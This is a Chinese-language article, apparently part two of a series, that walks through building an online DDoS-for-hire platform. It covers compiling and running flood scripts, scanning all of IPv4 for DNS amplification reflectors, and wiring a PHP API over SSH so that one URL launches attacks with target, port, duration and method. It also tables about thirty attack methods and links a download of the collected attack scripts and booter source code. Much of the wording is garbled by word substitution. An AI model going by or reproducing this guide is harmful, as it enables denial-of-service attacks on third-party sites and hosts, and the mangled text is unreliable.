注:本文主见互换与科研学习,请勿对该技能进行恶意利用!
本平台及作者对读者的之后的行为不承担当何法律任务。

序言

在上集我们已经知道了DDOS流量的获取办法,并且总结出每种流量的获取办法。
事理说的差不多了,以是这篇文章将环绕技能角度攥写。
在末了部分我将会发放辛辛劳苦网络的各种DDOS攻击脚本和各种在线DDOS平台的源代码

ddosphp网页端源码搭建DDoS练习训练揭秘在线DDoS进击平台下 Node.js

如果没看过上集的请参考该链接:走近科学:揭秘在线DDoS攻击平台(上)

流量掌握

当我们获取到足够流量的时候就须要对流量进行管理和分配。
DDOS流量的管理可以分为以下三大类,分别是单一DDOS脚本掌握,单个API接口掌握多个DDOS脚本和单个CMS或者API掌握多个API接口。

单一DDOS脚本掌握

这类流量掌握是最大略的,属于一个谢绝做事攻击(DOS),还不能称之为分布式谢绝做事攻击(DDOS)。
黑客通过源代码编译好一个脚本后直接对目标站点进行攻击。
这种掌握办法紧张运营在压力测试仿照阶段上,并不会用作真正的DDOS攻击。
由于流量过小,攻击办法过于单一。

单个API接口掌握多个DDOS脚本

这时安全研究职员为了使攻击繁芜化,也为了方便流量的管理。
这个时候会编译一个API接口来统一管理全部的DDOS流量。

单个CMS或者API掌握多个API接口

在DDOS攻击里面,我们须要用到浩瀚的做事器,那么单个API已经不能知足我们的需求了。
这时每个做事器都会有一个自己的API接口,于是我们又会再去重新编写一个API接口来管理全部做事器的API接口。
在攻击目标站点的时候,只须要一个命令,全部的做事器都会对目标站点展开各种各样的DDOS攻击。

DDOS脚本先容

在上一篇我已经说过DDOS攻击分为Layer4和Layer7两个大类,并且每个Layer都有很多种攻击办法,本日我们就来说一下怎么利用这些DDOS攻击脚本。

编译脚本文件

我所供应和网络的DDOS脚本文件全部都是由C++所编写,以是在Linux上用gcc来对脚本进行编译。

利用以下命令对源代码进行编译

gcc 脚本名称.c -o 脚本名称 -lpthread

或者

gcc 脚本名称.c -lpthread -lpcap -o 脚本名称

编译完成后须要对该脚本授予足够的权限

chmod 755 脚本名称

对脚本编译及授予权限

利用DDOS脚本

我先拿一个ACK DDOS脚本举个例子。
我们可以看到这个攻击脚本须要的紧张因此下几个命令参数。

,/脚本名称 <攻击线程> <是否限定流量(如果不限输入-1)> <攻击韶光>

ACK DDOS命令

那么我们来考试测验一下对局域网内IP进行DDOS攻击。
可以看到目标IP已经无法ping通了。

利用ACK DDOS攻击某主机

AMP列表扫描

但是有时候我们会看到AMP DDOS攻击须要添加一个AMP列表,如下图赤色方框所示。
这个AMP列表到底是什么?又是怎么得到到?

DNS反射攻击(须要AMP文件)

这里我须要详细阐明一下。
AMP的全称是Amplification,中文意思便是放大。
比如大家熟习的DNS反射型攻击便是一个标准的AMP DDOS攻击。
其事理是A做事器发送大量的数据包给大量的DNS做事器,但是数据包是修改过的。
黑客会把发送过去的数据包里A做事器的IP地址变动成B做事器的IP地址。
DNS做事器会以为是B做事器发送的数据包,于是就会把返回的数据包发送给B做事器。
DNS放大攻击的好处是可以用一台主机达到N台主机的攻击效果。

大家可以参考以下图片来理解。

DNS AMP DDOS攻击

而我们所须要的AMP列表便是环球所有的DNS做事器IP地址或者是可以做数据包跳转的IP地址。
在我供应的源代码里面也有AMP资源扫描脚本文件的源代码,编译办法同上。

DNS扫描器指令

一样平常情形下,我们会把1.1.1.1作为开头IP地址,然后把255.255.255.255作为末端IP地址,这样就可以扫描到环球的DNS做事器的IP地址了。
DNS反射攻击只是AMP DDOS攻击的个中一种,还有很多AMP DDOS攻击办法,比如MySQL AMP DDOS攻击,NTP AMP DDOS攻击等。
以1GB的上行宽带速率来看,一样平常须要3-5个小时才能扫描完成。

AMP列表自动化更新理念

一个AMP列表的制作就须要数个小时,那么多AMP列表的制作须要的韶光就更久了。
这里想了一个办法能够让大家快速的得到这些AMP列表。
这里大家先别激动,这个只是一个想法,还并没有人去实行。

首先是是一个人或者团队专门来卖力对AMP 列表的更新和掩护,扫描到的列表天生txt文本文件后存放在WEB做事器上。
随后这个人或者团队可以免费或者付费对大家开放列表的下载地址。
如果有人的AMP列表须要更新,在做事上写一个sh可实行文件,内容为

#!/bin/bashrm -I 老的AMP列表1.txtrm -I 老的AMP列表2.txt…………省略…………wget http://AMP列表存放的域名/新的AMP列表1.txtwget http://AMP列表存放的域名/新的AMP列表2.txt…………省略…………

然后直接运行这个可实行程序,那么全体AMP列表的内容就会随之更新了。
目前环球没一个人在做这件事,有兴趣(金钱和技能)的人可以考虑做做看。

常用DDOS攻击办法

由于DDOS攻击的办法太多了,我无法把每个攻击的办法和事理都详细的讲解一遍。
如果每种攻击办法都详细讲一遍,差不多可以出一本书了。
但是大家可以参考下面这个表格去网上搜索干系的资料和脚本代码。

攻击名称攻击层数目标种类命令填写格式GETLayer 7网站,做事器IP等填写网站链接: http://xxxx.co mHEADLayer 7网站,做事器IP等填写网站链接: http://xxxx.co mPOSTLayer 7网站,做事器IP等填写网站链接: http://xxxx.co mJSBYPASSLayer 7网站,做事器IP等填写网站链接: http://xxxx.co mJOOMLALayer 7网站,做事器IP等填写网站链接: http://xxxx.co mXMLRPCLayer 7网站,做事器IP等填写网站链接: http://xxxx.co mSNMPLayer 4个人主机,做事器IP等填写IP地址: 192.168.0.1SSDPLayer 4个人主机,做事器IP等填写IP地址: 192.168.0.1DNSLayer 4个人主机,做事器IP等填写IP地址: 192.168.0.1CHARGENLayer 4个人主机,做事器IP等填写IP地址: 192.168.0.1NTPLayer 4个人主机,做事器IP等填写IP地址: 192.168.0.1TS3Layer 4个人主机,做事器IP等填写IP地址: 192.168.0.1SSYNLayer 4个人主机,做事器IP等填写IP地址: 192.168.0.1DOMINATELayer 4个人主机,做事器IP等填写IP地址: 192.168.0.1ACKLayer 4个人主机,做事器IP等填写IP地址: 192.168.0.1NGSSYNLayer 4个人主机,做事器IP等填写IP地址: 192.168.0.1OVXLayer 4个人主机,做事器IP等填写IP地址: 192.168.0.1TCPACKLayer 4个人主机,做事器IP等填写IP地址: 192.168.0.1TCPSYNLayer 4个人主机,做事器IP等填写IP地址: 192.168.0.1TCPRSTLayer 4个人主机,做事器IP等填写IP地址: 192.168.0.1TCPURGLayer 4个人主机,做事器IP等填写IP地址: 192.168.0.1TCPPUSHLayer 4个人主机,做事器IP等填写IP地址: 192.168.0.1TCPECELayer 4个人主机,做事器IP等填写IP地址: 192.168.0.1TCPCWRLayer 4个人主机,做事器IP等填写IP地址: 192.168.0.1ICMPLayer 4个人主机,做事器IP等填写IP地址: 192.168.0.1MUDPLayer 4个人主机,做事器IP等填写IP地址: 192.168.0.1VSELayer 4个人主机,做事器IP等填写IP地址: 192.168.0.1ATCPLayer 4个人主机,做事器IP等填写IP地址: 192.168.0.1

DDOS API搭建

API搭建准备

你利用一两个DDOS脚本还好,但是如果你要利用几十个DDOS脚本呢?一个一个的实行吗?以是我们还须要搭建一个API来对这些脚本文件进行调用。
API编写最简便的还是PHP,以是我们还须要在做事器上搭建干系的环境。
这些命令只适用于Cent OS,其它版本的Linux系统请自行Google。

输入以下命令进行安装

1.yum -y update2.yum install gcc libcap libpcap libpcap-devel screen php dstat cmake gmp gmp-devel gengetopt byacc flex git json-c zmap iptraf nano(或者直接输入yum groupinstall \公众Development Tools\"大众)3.yum groupinstall \"大众Development Tools\公众4.yum install gcc php-devel php-pear libssh2 libssh2-devel5.pecl install -f ssh26.touch /etc/php.d/ssh2.ini7.echo extension=ssh2.so > /etc/php.d/ssh2.ini8.Service httpd restart

就这么大略,环境已经搭建完成。
然后你须要把API文件,DDOS脚本和AMP列表文件文件放入到你的WEB目录内。
环境创建完毕后默认的WEB目录在

/var/www/html

API文件编辑

这时你须要对你的API文件进行编辑。
我们先来看看这个API文件哪里须要改的。

如下图所示,在代码第六行那里有个红方框,在红方框内设置一个你自己的Key Code。

Key Code设置

在11行那里我们须要输入做事器的IP地址,SSH的账号和密码。

做事器SSH IP地址,账号和密码

从43行到63行是调用脚本文件的。
在==后面填写的是DDOS攻击名称,./后面随着的是脚本的路径和文件名称,然后每个$后面的变量值都是要填写的指令,如果没有动态变量那么直接填写干系命令,比如AMP列表文件名称。
如果你的DDOS脚本文件或者AMP列表文件在其它文件夹,那么请确保对API内的DDOS脚本文件路径进行变动,并且确定这个API文件有权限访问你的脚本文件所在目录。

调用DDOS攻击脚本文件

然后便是利用这个API文件了,根据源代码的里面的各种变量和常量值,我们可以这么构建。

http://做事IP地址/api.php?key=自己设置的Key Code&host=目标地址&time=攻击韶光&port=端口&method=攻击办法

举例:

http://192.168.1.2/api.php?key=keycode&host=192.168.1.3&time=50&port=80&method=DNS

API调用文件核查

搭建完API后我们须要核实一下是否成功的对脚本进行调用。
这里很大略,直接用HTOP查看全体做事器的进程就行。
输入以下命令开启htop做事。

htop

下面这张图是未实行API前的运行程序

未实行API前

下面这张图是实行API后的运行程序,可以创造多了几个DDOS攻击脚本运行在后台。

实行API后

在线DDOS演习训练系统搭建

在线DDOS平台的搭建也没多繁芜,我已经供应给大家足够的在线DDOS CMS源码,并且都附上了数据库构造。
这些在线DDOS平台都是采取PHP编写,数据库都是MySQL。
每个CMS都有特定的文件来填写DDOS API,在填写API的文件里面可以填写多个API,之后要发送攻击命令的时候只须要调用一个API接口,这个API接口又会调用你输入的API接口,然后你输入的API接口又会调用全部的DDOS攻击脚本文件,非常的方便。
这个地方须要遍及的知识太多了,但是凡是搭建过WEB做事器的人都很清楚这些流程,我就不专门去讲了,大家自己研究一下。

某在线DDOS平台API插入界面

尾声与感想

我通过各种PY交易得到了大量的在线DDOS平台的源码和DDOS脚本的源代码,为了这个专题也花了不少的精力和少许的金钱,但是能够免费的为海内的安全研究职员供应一个在线DDOS平台的研究我是非常高兴的。

但是我为什么不供应像低轨道粒子炮,HUC DDOS这种工具?得了吧,那种东西不配叫做DDOS(分布式谢绝做事)攻击,称其量只能算作DOS(谢绝做事)攻击,拿来打苍蝇都打不去世。
与其供应给你们一把AK47,不如直接给你们制造核弹头的原材料。

传送门开启!
http://pan.baidu.com/s/1pLeVmMR(密码freebuf)

笔者曾在美国生活,美国在线DDOS平台处于一个法律的灰色地带,你既不能说它造孽,也不能完备说它合法,由于DDOS和大流量的攻击演习训练并没有太清晰的界线。
我在美国那段期间有幸和一个在线DDOS平台的站长聊过几次,他说他们的紧张收入都是来自中国,他乃至想专门弄一个中文版本的在线DDOS平台,只可惜他不会中文,而且又担心被GFW拦截。
在中国开DDOS在线平台只有授权检测证明我才能购买这个做事,而客户群体普遍都是厂商,针对个人用户的反而很少。
于此同时就造成DDOS演习训练在海内变成了供不应求的局势,要做压力测试厂商有时只能被迫去购买国外的流量。
在这种情形下,压力测试做事只能成为安全厂商的一个附加做事。

据笔者理解,海内诸如阿里巴巴、腾讯、淘宝都有专门的DDOS演习训练平台,可以自动化的演习训练此类攻击,因而这些企业对付DDOS的防御能力是相对较强的。

可是其他海内的互联网厂商做过正规压力测试做事的非常少,基本上只要三个G的上行流量可以打去世海内一大堆网站,并且不管这些厂商用什么做事器。
DDOS攻击是最难防御的,也是威胁程度很高的。
但是值得光彩的是海内还有个GFW对这些DDOS流量进行拦截。

在2016年仲春,爱尔兰就遭受到大规模的DDOS攻击,全体国家的网络差点瘫痪。
那么中国企业能够应对这种压力吗?海内厂商和政府的做事器是否做好了抗DDOS的准备?